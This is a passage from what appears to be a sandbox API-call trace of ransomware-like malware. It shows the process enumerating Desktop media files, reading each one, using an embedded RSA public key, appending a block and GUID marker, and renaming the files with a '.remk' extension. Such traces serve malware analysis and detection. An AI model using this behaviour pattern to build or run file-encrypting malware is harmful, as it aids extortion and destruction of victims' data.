KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.399] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.400] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.400] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.400] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.400] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.400] GetLastError () returned 0x0 [0231.400] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.400] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.400] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.400] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.400] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.400] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.401] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x236f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.401] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.401] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.401] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.401] CloseHandle (hObject=0x640) returned 1 [0231.402] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LVyvDGQMzfnGN8ouyoSW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lvyvdgqmzfngn8ouyosw.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LVyvDGQMzfnGN8ouyoSW.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lvyvdgqmzfngn8ouyosw.gif.remk")) returned 1 [0231.404] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39776bf0, ftCreationTime.dwHighDateTime=0x1d5e644, ftLastAccessTime.dwLowDateTime=0xde405620, ftLastAccessTime.dwHighDateTime=0x1d5d95a, ftLastWriteTime.dwLowDateTime=0xde405620, ftLastWriteTime.dwHighDateTime=0x1d5d95a, nFileSizeHigh=0x0, nFileSizeLow=0x622b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mnMSRkjKAAPEI.mkv", cAlternateFileName="MNMSRK~1.MKV")) returned 1 [0231.404] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mnMSRkjKAAPEI.mkv") returned=".mkv" [0231.404] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mnMSRkjKAAPEI.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mnmsrkjkaapei.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.405] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=25131) returned 1 [0231.405] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.407] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x6205, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.408] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.409] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x622b, lpOverlapped=0x0) returned 1 [0231.410] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.410] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.410] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.410] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.411] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.412] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.412] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.412] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.412] GetLastError () returned 0x0 [0231.412] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.412] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.412] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.412] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.412] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.412] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.413] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x622b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.413] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.413] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.413] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.413] CloseHandle (hObject=0x640) returned 1 [0231.414] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mnMSRkjKAAPEI.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mnmsrkjkaapei.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mnMSRkjKAAPEI.mkv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mnmsrkjkaapei.mkv.remk")) returned 1 [0231.416] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dd94290, ftCreationTime.dwHighDateTime=0x1d5dcfa, ftLastAccessTime.dwLowDateTime=0x35d63a70, ftLastAccessTime.dwHighDateTime=0x1d5d7cc, ftLastWriteTime.dwLowDateTime=0x35d63a70, ftLastWriteTime.dwHighDateTime=0x1d5d7cc, nFileSizeHigh=0x0, nFileSizeLow=0xcad5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nJnoBRDZOm.mkv", cAlternateFileName="NJNOBR~1.MKV")) returned 1 [0231.416] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nJnoBRDZOm.mkv") returned=".mkv" [0231.416] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nJnoBRDZOm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njnobrdzom.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.416] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=51925) returned 1 [0231.416] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.419] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xcaaf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.419] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.422] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xcad5, lpOverlapped=0x0) returned 1 [0231.423] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.423] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.423] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.423] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.425] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.425] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.425] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.425] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.425] GetLastError () returned 0x0 [0231.425] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.425] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.425] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.425] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.425] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.425] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.426] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xcad5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.426] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.426] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.426] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.426] CloseHandle (hObject=0x640) returned 1 [0231.428] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nJnoBRDZOm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njnobrdzom.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nJnoBRDZOm.mkv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njnobrdzom.mkv.remk")) returned 1 [0231.430] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb25eb310, ftCreationTime.dwHighDateTime=0x1d5dd3a, ftLastAccessTime.dwLowDateTime=0x457a61c0, ftLastAccessTime.dwHighDateTime=0x1d5e73c, ftLastWriteTime.dwLowDateTime=0x457a61c0, ftLastWriteTime.dwHighDateTime=0x1d5e73c, nFileSizeHigh=0x0, nFileSizeLow=0x11e26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O50 BhA.wav", cAlternateFileName="O50BHA~1.WAV")) returned 1 [0231.430] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O50 BhA.wav") returned=".wav" [0231.430] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O50 BhA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o50 bha.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.430] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=73254) returned 1 [0231.430] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.433] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.433] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.435] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.435] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x11e26, lpOverlapped=0x0) returned 1 [0231.436] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.436] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.436] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.436] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.438] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.438] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.438] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.438] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.438] GetLastError () returned 0x0 [0231.438] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.438] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.438] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.438] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.438] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e30) returned 0x37c2278 [0231.439] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1560 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede30 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c15a8 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede48 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede78 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eded8 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede90 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0231.439] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.439] HeapFree (in: hHeap=0x630000, 